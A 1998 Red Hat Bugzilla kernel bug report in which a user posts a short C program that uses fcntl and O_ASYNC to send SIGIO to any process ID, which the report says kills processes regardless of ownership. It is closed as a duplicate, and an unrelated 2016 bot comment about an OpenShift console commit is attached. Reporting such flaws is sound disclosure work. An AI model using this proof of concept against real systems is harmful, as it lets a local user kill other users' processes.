Note: This is a beta release of Red Hat Bugzilla 5.0. The data contained within is a snapshot of the live data so any changes you make will not be reflected in the production Bugzilla. Also email is disabled so feel free to test any aspect of the site that you want. File any problems you find or give feedback here.
Bug 91 - This is some kind of superkill
Summary: This is some kind of superkill
Keywords:
Status: CLOSED DUPLICATE of bug 78
Alias: None
Product: Red Hat Linux
Classification: Retired
Component: kernel
Version: 5.1
Hardware: i386
OS: Linux
high
high
Target Milestone: ---
Assignee: David Lawrence
QA Contact:
URL:
Whiteboard:
Depends On:
Blocks:
TreeView+ depends on / blocked
 
Reported: 1998-11-16 16:01 UTC by michelcas
Modified: 2016-06-27 20:21 UTC (History)
1 user (show)

Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Clone Of:
Environment:
Last Closed: 1998-11-16 16:04:13 UTC


Attachments (Terms of Use)

Description michelcas 1998-11-16 16:01:01 UTC
I am using:
  Red Hat Linux release 5.1 (Manhattan)
  Kernel 2.0.34 on an i586

This little code:
  #include <fcntl.h>
  #include <errno.h>
  #include <stdio.h>
  #include <stdlib.h>
  #include <unistd.h>

  int main(int argc, char *argv[]) {
    int s, p;
    if (argc != 2) {
      fputs("Please specify a pid to send signal to.\n",
stderr);
      exit(0);
    } else {
      p = atoi(argv[1]);
    }
    fcntl(0,F_SETOWN,p);
    s = fcntl(0,F_GETFL,0);
    fcntl(0,F_SETFL,s|O_ASYNC);
    printf("Sending SIGIO - press enter.\n");
    getchar();
    fcntl(0,F_SETFL,s&~O_ASYNC);
    printf("SIGIO send attempted.\n");
    return 0;
  }

Can kill just about anything without looking at ownership.

I just guessed the problem is in the kernel ???


I am nost sure if this have been fixed, or even looked at
but a little pointer to a solution would be greatly
appreciated.

Thx,

michelcas@pyramidsystems.com

Comment 1 Bill Nottingham 1998-11-16 16:04:59 UTC
*** This bug has been marked as a duplicate of 78 ***

Comment 2 openshift-github-bot 2016-06-27 20:21:22 UTC
Commit pushed to master at https://github.com/openshift/origin-web-console

https://github.com/openshift/origin-web-console/commit/2c6c5750a7960ecd38b709d097218b65f9bacb44
Fixes Issue #91 - Build-configs URL Tab Navigation

-Can now use ?tab=summary, ?tab=configuration, and ?tab=environment to navigate around the build-configs page.


Note You need to log in before you can comment on or make changes to this bug.